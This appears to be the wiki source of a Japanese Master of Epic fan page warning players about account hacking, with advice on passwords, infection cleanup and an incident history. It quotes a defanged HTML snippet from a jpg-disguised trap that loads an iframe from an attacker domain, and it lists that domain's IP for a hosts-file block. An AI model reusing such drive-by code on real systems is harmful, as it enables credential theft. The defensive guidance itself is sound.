安全のために
をテンプレートにして作成
[
トップ
] [
新規
|
一覧
|
単語検索
|
最終更新
|
ヘルプ
]
開始行:
#topicpath
*安全のために [#i5f97081]
''COLOR(red){海外(特に中国)からのアカウントハックに要注...
''COLOR(red){MoE以外のネットゲームでも被害が起きているよ...
''COLOR(red){該当者は[[公式サイトのサポート窓口>https://m...
''COLOR(red){パスワードの使い回しは絶対にやめ、パスワード...
- 重要なお知らせ -
不正アクセスの被害に遭われているアカウントの特徴といたし...
「 パスワードを長い間変更していないアカウント 」や、
「 推測されやすいパスワードを設定しているアカウント 」が...
第三者にわかりやすいパスワードは非常に危険ですので、
推測されやすいパスワードは設定しない事を強くお勧めいたし...
========================================================...
【推測されやすいパスワードの例】
・aaaa00000 など同じ文字、数字が連続するパスワード
・qwer67890 などキーボードの文字配列に近い英数字を順...
・moe01 などゲーム名や商品名、単語などよく知られてい...
・ゲームIDの後半に数字を追加したパスワード
========================================================...
========================================================...
パスワードを定期的に変更していない場合や、
他のサービスと同様のパスワードを使用している場合、
この機会に変更する事を強くお勧めいたします。
こまめなパスワード変更はアカウントハック対策にとって非常...
また、他のサービスで同じゲームIDとパスワードの組み合わせ...
『 Master of Epic 』独自のパスワードにご変更いただけます...
========================================================...
「 Master of Epic 」運営チームでは、
不正アクセスと疑われる接続を確認した場合、
お客様へのご連絡を待たずに、調査のため
ゲームIDを一時停止させていただく場合がございます。
お客様にはご不便をお掛けいたしますが、
正常にゲームIDとパスワードを入力してもゲームにログインで...
下記お問合わせフォームをご記載いただき
サポート窓口までご連絡いただきますようお願いいたします。
ご連絡いただきましたアカウントにつきましては、
順次、調査を行い、安全が確認された時点で運営チームにてパ...
一時停止の解除を行わせてただいております。
#contents
**新着情報 [#g40599b4]
-公式ニュース [[14-06-10 セキュリティ強化キャンペーン:htt...
--パスワード変更を促進するためのキャンペーン
-公式ニュース [[14-04-22 セキュリティ強化キャンペーン開始...
--パスワード変更を促進するためのキャンペーン
-公式ニュース [[13-06-08 文字認証強化のお知らせ:http://mo...
--ひらがなに加え、英数字にも対応
-公式ニュース [[13-05-15 【重要】不正アクセスによるアカウ...
-公式ニュース [[13-05-13 【重要】アカウントハッキングによ...
-公式ニュース [[13-05-06 【重要】ゲームID・メールアドレス...
-公式ニュース [[12-12-25 「 セキュリティ強化キャンペーン ...
--パスワード変更を促進するためのキャンペーン
-[[12-05-22「キャラクター認証」導入のお知らせ:http://moep...
--ログイン時に【 最後にゲームへログインした 】キャラクタ...
-[[12-05-18 「 セキュリティ強化キャンペーン 」開始のお知...
--パスワード変更を促進するためのキャンペーン
-[[12-04-22 臨時メンテナンス終了のお知らせ:http://moepic...
--公式サイトへのログイン時に文字認証が必要
-[[12-03-26 【重要】お客様へ、パスワード変更のお願い:http...
-[[10-06-15 公式サイトのログインロックシステム導入のお知...
--公式サイトへのログイン時に5回以上、連続してパスワードの...
アカウントがロックされるシステムが導入
-[[10-05-02 RMT・アカウントハックに対する取り組みについて...
**何が起こっているのか? [#x8b121d1]
2006年10月頃から、海外(特に中国)からオンラインゲームを...
その多くはRMT(現金取引)の業者といわれています。~
アップローダに当時(2006/10)上げられた中国のHTML偽装jpg...
ドメイン情報 www■zhangweijp■com 61.139.126.10
country: CN
CHINANET Sichuan province network (シナ四川省)
61.139.0.0 - 61.139.127.255
あきらかにROで各種サイトにリンクを貼り付けてアカウントハ...
中国人アカウントハック集団のサイトです。(www■zhangweijp■c...
またリネージュでも被害が確認されている老舗(?)アカウントハ...
tmsn.exeという実行ファイルを強制DLさせられるので注意
これ以外にも様々なものがあります。上記URL以外にも十分気を...
RagnarokOnlineやリネージュなどが被害の中心でしたが、その...
Master of Epicも例外ではなく、実際に罠を仕掛けられたこと...
**どんな手を使っているのか? [#r41d621d]
2007年3月段階で確認されているものをあげておきます。時間の...
大まかな手口としては、
+偽装やその他の手段で悪意のあるプログラムを設置してあるサ...
+セキュリティの穴をついて悪意のあるプログラムを仕掛ける
+悪意のあるプログラムがPC内の情報を、どこかに送信する
といったことが行われます。
-jpg偽装型
--アップローダーなどにjpg画像ファイルに偽装をし、アカウン...
--コメントに「Dツアーおつかれさま」などと書き込み、警戒を...
--InternetExplorerやIEコンポーネントのブラウザで踏むとキ...
--中身は下記のようなものが一例
<html>
<iframe src="http://www■zhangweijp■com/tt2/index■htm" wi...
<center><img src="http://www■zhangweijp■com/jpg/001■jpg"...
</html>
(上記は元ソースから.(ドット)を■に置き換えてある)
--罠jpgのURLを2chの掲示板などに貼り付けたりということもある
-Wiki編集型
--Wikiの編集しやすさを逆手に取り、リンクをアカウントハッ...
--''このWikiでは外部へのリンクに記号がつきます''
---参考:http://moepic.com/ ←一番右にあるマークが外部リン...
--外部リンクの際には飛ぶ先が本当に正しいか注意してください
-Blogコメント型
--個人の運営するBlogに、興味を持つようなコメントを付ける...
--例えば、「Blog移転しました、今度からはこっちをブックマ...
-ネットカフェ仕込み型
--不特定多数の人が使うネットカフェにキーロガーなどを仕込...
-ゲーム内URL表記型
--募集チャンネルなどに鍵付きでURLのみを記載、疑問に思った...
-フリーメール経由型
--ブラウザベースのフリーメールアカウントが流出すると、そ...
--2009年10月に起きたHotmailアカウントの流出以後、この手口...
**何をすればいいの? [#z7749630]
以下は要点となります。higaitaisaku.comさんの『被害対策』→...
-基本
--定期的なWindowsUpdate及び、各種ソフト(メディアプレーヤ...
--安易なパスワードを使わないこと及び、より強力なパスワー...
--定期的なパスワードの変更
---ゲームアカウントだけでなく、登録メールアドレスのアカウ...
--アンチウイルスソフトの導入とウイルス定義ファイルの積極...
--パーソナルファイアーウォールソフトの導入
--アドレスをホイホイ踏まない。よく確認する。「ソースチェ...
--出所の怪しいプログラムやスクリプトを実行しない
--アカウント関連のメールをサーバに残さない(手元にダウン...
-応用
--IEの使用を止め、他のブラウザに乗り換える (Firefox、Opera)
--IEコンポーネント使用のブラウザを使う (セキュリティ設定...
--信頼できるSite以外ではスクリプトやActiveXを切る
---インターネットオプションのセキュリティの部分で設定可能
--偽装jpg対策 (IE6sp2 と IE7限定。IE6sp1以前では出来ない)
---インターネットオプション→セキュリティ→レベルのカスタマ...
**何をすればいいの?もっと詳しく [#j819b7eb]
-接続禁止IPレンジの設定
--セキュリティソフト等で61.139.0.0 - 61.139.127.255を接続...
--ファイアウォールソフトごとに設定の可否、またその方法も...
-hosts編集 (接続拒否設定)~
--hostsが何かについては[[こちら>http://ja.wikipedia.org/w...
--Windows XP、Windows Server 2003 の場合 : c:\windows\sys...
--Windows 2000 の場合 : c:\winnt\system32\drivers\etc\hosts
--編集はtxt editorで行えます
--編集後は上書き禁止にすること
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP f...
#
# This file contains the mappings of IP addresses to hos...
# entry should be kept on an individual line. The IP add...
# be placed in the first column followed by the correspo...
# The IP address and the host name should be separated b...
# space.
#
# Additionally, comments (such as these) may be inserted...
# lines or following the machine name denoted by a '#' s...
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source...
# 38.25.63.10 x.acme.com # x clie...
127.0.0.1 localhost
0.0.0.0 61.139.126.10
--#の行はコメントなのでなくてもよいです
--hosts編集の意味について~
例) 0.0.0.0 [tab] www.yahoo.com~
このようにすると、www.yahoo.com を開こうとしても強制的...
このため、0.0.0.0の部分には存在しないアドレスを記入する...
開きたくないアドレスなどがあれば、各自で変えておきまし...
**PCにウィルス対策ソフトを導入してない方へ [#de27ee03]
※一種類で安心しないように
-avast!アンチウイルス 有料版と無料版があり、どちらも60日...
--http://www.avast.com/index_jpn.html
-ZoneAlarm(ファイヤーウォールソフト 基本機能だけの無料...
--http://www.zonealarm.com/store/content/company/products...
-トレンドマイクロ ウイルスバスターオンラインスキャン
--http://www.trendmicro.co.jp/hcall/index.asp
-Ad-Aware SE スパイウェア対策ソフト 有料の「Professiona...
--http://www.lavasoft.com/products/ad-aware_se_personal.php
-Spybot 無料のスパイウェア対策ソフト
--http://enchanting.cside.com/security/spybot1.html
-Kaspersky Anti-Virus (体験版) オンライン ウイルス&スパ...
--http://www.kaspersky.co.jp/
-NOD32 アンチウイルス (体験版)
--http://www.canon-sol.jp/product/nd/trial.html
2chのネトゲ実況3のスレにこれらのアドレス(アップローダー...
また、このページと同じように警戒を呼びかける文章で、ウイ...
十分に気を付けましょう。
アカウントハックされても基本的に自己責任となり、また、失...
自分の身は自分で守りましょう。
**怪しいファイルを踏んでしまったときには [#l9b237d2]
***感染したと思ったら? [#e87a0d15]
+''まずは落ち着きましょう''
--冷静に対処を行う必要があります
--&color(red){どういう状況で感染したか};(したと思ったのか...
+''LANケーブル/電話線を引っこ抜きましょう''
--既にID&Passを送信されていなければ、単純ですが最も効果の...
--ケーブルを繋いだ状態、若しくは加えてMoEを起動したり公式...
+''安全と思われるPCより公式にアクセス、Passwordを変更する''
--ウイルス感染中のPCを決して使用してはいけません。
--他にPCを所持してない場合は、下の『注意』の項を参照の事
+''システムの復元オプションを無効にする'' (Windows Me/XP)
--何とかシステムを復旧させてもバックアップから復活されて...
--[[WindowsMEの方法>http://service1.symantec.com/SUPPORT/...
--[[WindowsFAQ>http://winfaq.jp/]]も参考になるでしょう
--完全復旧後はこれと逆の操作を行い、復旧オプションを有効...
+''アンチウイルスソフトとスパイウェア検出ソフトでPCをチェ...
--必須です。出来るだけ最新の定義ファイルである事が望まし...
--アンチウイルスソフト等が入ってない場合は、速攻買ってく...
--オンラインスキャンという手も有りますが、Networkに繋がっ...
--アンチウイルスソフトの探知から逃れるべくウイルスは日々...
--上手く削除できない場合はセーフモードやコマンドプロンプ...
+''それでも不安なら…''
--PCの再セットアップ(OSのクリーンインストール)を行いまし...
--アカウントハック関連のウイルスは感染性が弱めなので、感...
+''公的機関への届け出''
--実際に被害があった場合は正真正銘の犯罪ですので警察への...
--[[警察庁サイバー犯罪対策>http://www.npa.go.jp/cyber/]]...
--また、独立行政法人 情報処理推進機構 セキュリティセンタ...
統計データ上、オンラインゲーム関連の被害が増えている事が...
--[[IPA/ISEC 情報セキュリティに関する届出について>http://...
+''公式サポート窓口へ報告を行う''
--あまり期待は出来ませんが、やっておくに越した事は無いです
-''注意''
--基本は &color(red){感染PCのNetworkからの隔離}; と &colo...
--安全と思われるPCが無い場合は各自のスキルに依存します。...
+++手動/ソフトによるウイルス削除を頑張って行う (その後にP...
+++PCの再セットアップを頑張って行う (その後にPassword変更)
+++友人のPCやネットカフェ利用
+++1CD Linuxの利用 (Wikipedia:[[1CD Linux>http://ja.wiki...
--清浄化を確認するまでMoE関連のプログラムやSiteに近寄らず...
どう考えてもトロイっぽいのが動いているかどうか、まずはプ...
-マカフィーのサイト よくある質問: タスクマネージャを利用...
--http://www.mcafee.com/japan/mcafee/support/faq/answer_f...
-Windowsの「タスクマネージャ」を便利に使う3つのTips
--http://www.itmedia.co.jp/bizid/articles/0703/06/news050...
-プロセス? :マルチタスクOS環境におけるプログラムの実行単...
--http://www.atmarkit.co.jp/icd/root/78/5787378.html
-Windowsのスタートアップやタスクマネージャに現れるプロセ...
--http://cowscorpion.com/tasklist/index.html
---プロセスの名前と内容がよく判らない時はここで。通常存在...
-ベクター :プロセス関係のソフトウェアDLサービス
--http://www.vector.co.jp/vpack/filearea/win/util/task/
-怪しい常駐プログラムを動作させなくする方法
--スタート→「ファイル名を指定して実行」→ 名前(O): のとこ...
--システム構成ユーティリティが起動するので一番左のタブ「...
--スタートアップ項目、コマンドを確認して その壱で見つけた...
--存在する場合はその部分のスタートアップ項目からチェック...
--ちなみに"コマンド"部分にはその実行ファイル(exe)が存在す...
そのフォルダを開いて後で削除できるように覚えておく事※1
--OKを押すと「システム構成の変更を有効にするには、再起動...
--ブラウザなどの実行されているプログラムを全て閉じてから...
--念のために再起動する前にネット接続を物理的に遮断してお...
--再起動したらもう一度プロセスマネージャからトロイが実行...
--プロセスマネージャに存在していなければ※1で調べておいた...
--該当する実行ファイル(exe)を削除もしくは拡張子をexeからb...
--万が一、間違っていた場合に備えて拡張子を変更するだけに...
//この段落の「その壱」はどこのことでしょう
**アカウントハック以外の「安全のために」 [#y750d2b1]
上記のように直接アカウントへのアクセスを試みる業者の他に...
これらはアカウントハックを行うことを主な目的としないと思...
次のようなことが行われているようです。
-アダルトサイトやRMTサイトなどへの誘導
-ブラウザクラッシャーへの誘導
直接的な被害は大きくありませんが、怪しいURLは開かない事に...
怪しいと思ったときには~
aguse.jp http://www.aguse.jp/~
こういったところで、サーバーなどの情報を調べるのがよいで...
**謝辞 [#f4876a43]
このページを書くにあたり非常に参考にさせていただきました(...
参考: http://smith.rowiki.jp/?Security
どうもありがとうございます。
**MoE関連の事件履歴 [#kb4429f2]
-2006年10月
--アップローダーに「Dツアーおつかれさま」というコメントと...
-2007年5月
--ゲーム内募集チャンネルで鍵付きでURLのみ書かれたチャンネ...
-2007年7月
--このWikiのメニューバーほとんど全域にわたって日本語アダ...
-2007年8月30日
--このWikiのメニューバーの数カ所がウィルス「VBS/Psyme」(...
-2007年9月中旬〜10月10日
--作りたてと思われる旅人キャラが課金アイテムを相場より格...
--2007年10月10日、クレジットカードの不正利用があったと公...
--そのアナウンスによると、公式はこの件に関し当該アカウン...
-- [[07-10-10 クレジットカードの不正利用者に対する取り組...
-- [[07-10-11 クレジットカードの不正利用者に対する取り組...
-2007年10月21日
--Topページのリンクが海外の正体不明のサイトへのリンクへと...
-2007年12月4日
--クレジットカードの不正利用およびゲーム内の不正利用者へ...
-2007年12月7日
--日本語(利用規約を完全に理解できる日本語力)でのコミュ...
-2007年12月15日
--アップローダーにjpgに偽装したトロイが大量にアップロード...
-2007年12月20日
--アップローダーにjpgに偽装したトロイが大量にアップロード...
*コメント [#iebb1b29]
''わからないことは[[外部掲示板>Link/質問スレ]]の該当スレ...
//一応どんなかたちで使われるか分からないがコメントを付け...
#pcomment(安全のために/コメント,8)
終了行:
#topicpath
*安全のために [#i5f97081]
''COLOR(red){海外(特に中国)からのアカウントハックに要注...
''COLOR(red){MoE以外のネットゲームでも被害が起きているよ...
''COLOR(red){該当者は[[公式サイトのサポート窓口>https://m...
''COLOR(red){パスワードの使い回しは絶対にやめ、パスワード...
- 重要なお知らせ -
不正アクセスの被害に遭われているアカウントの特徴といたし...
「 パスワードを長い間変更していないアカウント 」や、
「 推測されやすいパスワードを設定しているアカウント 」が...
第三者にわかりやすいパスワードは非常に危険ですので、
推測されやすいパスワードは設定しない事を強くお勧めいたし...
========================================================...
【推測されやすいパスワードの例】
・aaaa00000 など同じ文字、数字が連続するパスワード
・qwer67890 などキーボードの文字配列に近い英数字を順...
・moe01 などゲーム名や商品名、単語などよく知られてい...
・ゲームIDの後半に数字を追加したパスワード
========================================================...
========================================================...
パスワードを定期的に変更していない場合や、
他のサービスと同様のパスワードを使用している場合、
この機会に変更する事を強くお勧めいたします。
こまめなパスワード変更はアカウントハック対策にとって非常...
また、他のサービスで同じゲームIDとパスワードの組み合わせ...
『 Master of Epic 』独自のパスワードにご変更いただけます...
========================================================...
「 Master of Epic 」運営チームでは、
不正アクセスと疑われる接続を確認した場合、
お客様へのご連絡を待たずに、調査のため
ゲームIDを一時停止させていただく場合がございます。
お客様にはご不便をお掛けいたしますが、
正常にゲームIDとパスワードを入力してもゲームにログインで...
下記お問合わせフォームをご記載いただき
サポート窓口までご連絡いただきますようお願いいたします。
ご連絡いただきましたアカウントにつきましては、
順次、調査を行い、安全が確認された時点で運営チームにてパ...
一時停止の解除を行わせてただいております。
#contents
**新着情報 [#g40599b4]
-公式ニュース [[14-06-10 セキュリティ強化キャンペーン:htt...
--パスワード変更を促進するためのキャンペーン
-公式ニュース [[14-04-22 セキュリティ強化キャンペーン開始...
--パスワード変更を促進するためのキャンペーン
-公式ニュース [[13-06-08 文字認証強化のお知らせ:http://mo...
--ひらがなに加え、英数字にも対応
-公式ニュース [[13-05-15 【重要】不正アクセスによるアカウ...
-公式ニュース [[13-05-13 【重要】アカウントハッキングによ...
-公式ニュース [[13-05-06 【重要】ゲームID・メールアドレス...
-公式ニュース [[12-12-25 「 セキュリティ強化キャンペーン ...
--パスワード変更を促進するためのキャンペーン
-[[12-05-22「キャラクター認証」導入のお知らせ:http://moep...
--ログイン時に【 最後にゲームへログインした 】キャラクタ...
-[[12-05-18 「 セキュリティ強化キャンペーン 」開始のお知...
--パスワード変更を促進するためのキャンペーン
-[[12-04-22 臨時メンテナンス終了のお知らせ:http://moepic...
--公式サイトへのログイン時に文字認証が必要
-[[12-03-26 【重要】お客様へ、パスワード変更のお願い:http...
-[[10-06-15 公式サイトのログインロックシステム導入のお知...
--公式サイトへのログイン時に5回以上、連続してパスワードの...
アカウントがロックされるシステムが導入
-[[10-05-02 RMT・アカウントハックに対する取り組みについて...
**何が起こっているのか? [#x8b121d1]
2006年10月頃から、海外(特に中国)からオンラインゲームを...
その多くはRMT(現金取引)の業者といわれています。~
アップローダに当時(2006/10)上げられた中国のHTML偽装jpg...
ドメイン情報 www■zhangweijp■com 61.139.126.10
country: CN
CHINANET Sichuan province network (シナ四川省)
61.139.0.0 - 61.139.127.255
あきらかにROで各種サイトにリンクを貼り付けてアカウントハ...
中国人アカウントハック集団のサイトです。(www■zhangweijp■c...
またリネージュでも被害が確認されている老舗(?)アカウントハ...
tmsn.exeという実行ファイルを強制DLさせられるので注意
これ以外にも様々なものがあります。上記URL以外にも十分気を...
RagnarokOnlineやリネージュなどが被害の中心でしたが、その...
Master of Epicも例外ではなく、実際に罠を仕掛けられたこと...
**どんな手を使っているのか? [#r41d621d]
2007年3月段階で確認されているものをあげておきます。時間の...
大まかな手口としては、
+偽装やその他の手段で悪意のあるプログラムを設置してあるサ...
+セキュリティの穴をついて悪意のあるプログラムを仕掛ける
+悪意のあるプログラムがPC内の情報を、どこかに送信する
といったことが行われます。
-jpg偽装型
--アップローダーなどにjpg画像ファイルに偽装をし、アカウン...
--コメントに「Dツアーおつかれさま」などと書き込み、警戒を...
--InternetExplorerやIEコンポーネントのブラウザで踏むとキ...
--中身は下記のようなものが一例
<html>
<iframe src="http://www■zhangweijp■com/tt2/index■htm" wi...
<center><img src="http://www■zhangweijp■com/jpg/001■jpg"...
</html>
(上記は元ソースから.(ドット)を■に置き換えてある)
--罠jpgのURLを2chの掲示板などに貼り付けたりということもある
-Wiki編集型
--Wikiの編集しやすさを逆手に取り、リンクをアカウントハッ...
--''このWikiでは外部へのリンクに記号がつきます''
---参考:http://moepic.com/ ←一番右にあるマークが外部リン...
--外部リンクの際には飛ぶ先が本当に正しいか注意してください
-Blogコメント型
--個人の運営するBlogに、興味を持つようなコメントを付ける...
--例えば、「Blog移転しました、今度からはこっちをブックマ...
-ネットカフェ仕込み型
--不特定多数の人が使うネットカフェにキーロガーなどを仕込...
-ゲーム内URL表記型
--募集チャンネルなどに鍵付きでURLのみを記載、疑問に思った...
-フリーメール経由型
--ブラウザベースのフリーメールアカウントが流出すると、そ...
--2009年10月に起きたHotmailアカウントの流出以後、この手口...
**何をすればいいの? [#z7749630]
以下は要点となります。higaitaisaku.comさんの『被害対策』→...
-基本
--定期的なWindowsUpdate及び、各種ソフト(メディアプレーヤ...
--安易なパスワードを使わないこと及び、より強力なパスワー...
--定期的なパスワードの変更
---ゲームアカウントだけでなく、登録メールアドレスのアカウ...
--アンチウイルスソフトの導入とウイルス定義ファイルの積極...
--パーソナルファイアーウォールソフトの導入
--アドレスをホイホイ踏まない。よく確認する。「ソースチェ...
--出所の怪しいプログラムやスクリプトを実行しない
--アカウント関連のメールをサーバに残さない(手元にダウン...
-応用
--IEの使用を止め、他のブラウザに乗り換える (Firefox、Opera)
--IEコンポーネント使用のブラウザを使う (セキュリティ設定...
--信頼できるSite以外ではスクリプトやActiveXを切る
---インターネットオプションのセキュリティの部分で設定可能
--偽装jpg対策 (IE6sp2 と IE7限定。IE6sp1以前では出来ない)
---インターネットオプション→セキュリティ→レベルのカスタマ...
**何をすればいいの?もっと詳しく [#j819b7eb]
-接続禁止IPレンジの設定
--セキュリティソフト等で61.139.0.0 - 61.139.127.255を接続...
--ファイアウォールソフトごとに設定の可否、またその方法も...
-hosts編集 (接続拒否設定)~
--hostsが何かについては[[こちら>http://ja.wikipedia.org/w...
--Windows XP、Windows Server 2003 の場合 : c:\windows\sys...
--Windows 2000 の場合 : c:\winnt\system32\drivers\etc\hosts
--編集はtxt editorで行えます
--編集後は上書き禁止にすること
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP f...
#
# This file contains the mappings of IP addresses to hos...
# entry should be kept on an individual line. The IP add...
# be placed in the first column followed by the correspo...
# The IP address and the host name should be separated b...
# space.
#
# Additionally, comments (such as these) may be inserted...
# lines or following the machine name denoted by a '#' s...
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source...
# 38.25.63.10 x.acme.com # x clie...
127.0.0.1 localhost
0.0.0.0 61.139.126.10
--#の行はコメントなのでなくてもよいです
--hosts編集の意味について~
例) 0.0.0.0 [tab] www.yahoo.com~
このようにすると、www.yahoo.com を開こうとしても強制的...
このため、0.0.0.0の部分には存在しないアドレスを記入する...
開きたくないアドレスなどがあれば、各自で変えておきまし...
**PCにウィルス対策ソフトを導入してない方へ [#de27ee03]
※一種類で安心しないように
-avast!アンチウイルス 有料版と無料版があり、どちらも60日...
--http://www.avast.com/index_jpn.html
-ZoneAlarm(ファイヤーウォールソフト 基本機能だけの無料...
--http://www.zonealarm.com/store/content/company/products...
-トレンドマイクロ ウイルスバスターオンラインスキャン
--http://www.trendmicro.co.jp/hcall/index.asp
-Ad-Aware SE スパイウェア対策ソフト 有料の「Professiona...
--http://www.lavasoft.com/products/ad-aware_se_personal.php
-Spybot 無料のスパイウェア対策ソフト
--http://enchanting.cside.com/security/spybot1.html
-Kaspersky Anti-Virus (体験版) オンライン ウイルス&スパ...
--http://www.kaspersky.co.jp/
-NOD32 アンチウイルス (体験版)
--http://www.canon-sol.jp/product/nd/trial.html
2chのネトゲ実況3のスレにこれらのアドレス(アップローダー...
また、このページと同じように警戒を呼びかける文章で、ウイ...
十分に気を付けましょう。
アカウントハックされても基本的に自己責任となり、また、失...
自分の身は自分で守りましょう。
**怪しいファイルを踏んでしまったときには [#l9b237d2]
***感染したと思ったら? [#e87a0d15]
+''まずは落ち着きましょう''
--冷静に対処を行う必要があります
--&color(red){どういう状況で感染したか};(したと思ったのか...
+''LANケーブル/電話線を引っこ抜きましょう''
--既にID&Passを送信されていなければ、単純ですが最も効果の...
--ケーブルを繋いだ状態、若しくは加えてMoEを起動したり公式...
+''安全と思われるPCより公式にアクセス、Passwordを変更する''
--ウイルス感染中のPCを決して使用してはいけません。
--他にPCを所持してない場合は、下の『注意』の項を参照の事
+''システムの復元オプションを無効にする'' (Windows Me/XP)
--何とかシステムを復旧させてもバックアップから復活されて...
--[[WindowsMEの方法>http://service1.symantec.com/SUPPORT/...
--[[WindowsFAQ>http://winfaq.jp/]]も参考になるでしょう
--完全復旧後はこれと逆の操作を行い、復旧オプションを有効...
+''アンチウイルスソフトとスパイウェア検出ソフトでPCをチェ...
--必須です。出来るだけ最新の定義ファイルである事が望まし...
--アンチウイルスソフト等が入ってない場合は、速攻買ってく...
--オンラインスキャンという手も有りますが、Networkに繋がっ...
--アンチウイルスソフトの探知から逃れるべくウイルスは日々...
--上手く削除できない場合はセーフモードやコマンドプロンプ...
+''それでも不安なら…''
--PCの再セットアップ(OSのクリーンインストール)を行いまし...
--アカウントハック関連のウイルスは感染性が弱めなので、感...
+''公的機関への届け出''
--実際に被害があった場合は正真正銘の犯罪ですので警察への...
--[[警察庁サイバー犯罪対策>http://www.npa.go.jp/cyber/]]...
--また、独立行政法人 情報処理推進機構 セキュリティセンタ...
統計データ上、オンラインゲーム関連の被害が増えている事が...
--[[IPA/ISEC 情報セキュリティに関する届出について>http://...
+''公式サポート窓口へ報告を行う''
--あまり期待は出来ませんが、やっておくに越した事は無いです
-''注意''
--基本は &color(red){感染PCのNetworkからの隔離}; と &colo...
--安全と思われるPCが無い場合は各自のスキルに依存します。...
+++手動/ソフトによるウイルス削除を頑張って行う (その後にP...
+++PCの再セットアップを頑張って行う (その後にPassword変更)
+++友人のPCやネットカフェ利用
+++1CD Linuxの利用 (Wikipedia:[[1CD Linux>http://ja.wiki...
--清浄化を確認するまでMoE関連のプログラムやSiteに近寄らず...
どう考えてもトロイっぽいのが動いているかどうか、まずはプ...
-マカフィーのサイト よくある質問: タスクマネージャを利用...
--http://www.mcafee.com/japan/mcafee/support/faq/answer_f...
-Windowsの「タスクマネージャ」を便利に使う3つのTips
--http://www.itmedia.co.jp/bizid/articles/0703/06/news050...
-プロセス? :マルチタスクOS環境におけるプログラムの実行単...
--http://www.atmarkit.co.jp/icd/root/78/5787378.html
-Windowsのスタートアップやタスクマネージャに現れるプロセ...
--http://cowscorpion.com/tasklist/index.html
---プロセスの名前と内容がよく判らない時はここで。通常存在...
-ベクター :プロセス関係のソフトウェアDLサービス
--http://www.vector.co.jp/vpack/filearea/win/util/task/
-怪しい常駐プログラムを動作させなくする方法
--スタート→「ファイル名を指定して実行」→ 名前(O): のとこ...
--システム構成ユーティリティが起動するので一番左のタブ「...
--スタートアップ項目、コマンドを確認して その壱で見つけた...
--存在する場合はその部分のスタートアップ項目からチェック...
--ちなみに"コマンド"部分にはその実行ファイル(exe)が存在す...
そのフォルダを開いて後で削除できるように覚えておく事※1
--OKを押すと「システム構成の変更を有効にするには、再起動...
--ブラウザなどの実行されているプログラムを全て閉じてから...
--念のために再起動する前にネット接続を物理的に遮断してお...
--再起動したらもう一度プロセスマネージャからトロイが実行...
--プロセスマネージャに存在していなければ※1で調べておいた...
--該当する実行ファイル(exe)を削除もしくは拡張子をexeからb...
--万が一、間違っていた場合に備えて拡張子を変更するだけに...
//この段落の「その壱」はどこのことでしょう
**アカウントハック以外の「安全のために」 [#y750d2b1]
上記のように直接アカウントへのアクセスを試みる業者の他に...
これらはアカウントハックを行うことを主な目的としないと思...
次のようなことが行われているようです。
-アダルトサイトやRMTサイトなどへの誘導
-ブラウザクラッシャーへの誘導
直接的な被害は大きくありませんが、怪しいURLは開かない事に...
怪しいと思ったときには~
aguse.jp http://www.aguse.jp/~
こういったところで、サーバーなどの情報を調べるのがよいで...
**謝辞 [#f4876a43]
このページを書くにあたり非常に参考にさせていただきました(...
参考: http://smith.rowiki.jp/?Security
どうもありがとうございます。
**MoE関連の事件履歴 [#kb4429f2]
-2006年10月
--アップローダーに「Dツアーおつかれさま」というコメントと...
-2007年5月
--ゲーム内募集チャンネルで鍵付きでURLのみ書かれたチャンネ...
-2007年7月
--このWikiのメニューバーほとんど全域にわたって日本語アダ...
-2007年8月30日
--このWikiのメニューバーの数カ所がウィルス「VBS/Psyme」(...
-2007年9月中旬〜10月10日
--作りたてと思われる旅人キャラが課金アイテムを相場より格...
--2007年10月10日、クレジットカードの不正利用があったと公...
--そのアナウンスによると、公式はこの件に関し当該アカウン...
-- [[07-10-10 クレジットカードの不正利用者に対する取り組...
-- [[07-10-11 クレジットカードの不正利用者に対する取り組...
-2007年10月21日
--Topページのリンクが海外の正体不明のサイトへのリンクへと...
-2007年12月4日
--クレジットカードの不正利用およびゲーム内の不正利用者へ...
-2007年12月7日
--日本語(利用規約を完全に理解できる日本語力)でのコミュ...
-2007年12月15日
--アップローダーにjpgに偽装したトロイが大量にアップロード...
-2007年12月20日
--アップローダーにjpgに偽装したトロイが大量にアップロード...
*コメント [#iebb1b29]
''わからないことは[[外部掲示板>Link/質問スレ]]の該当スレ...
//一応どんなかたちで使われるか分からないがコメントを付け...
#pcomment(安全のために/コメント,8)
ページ名: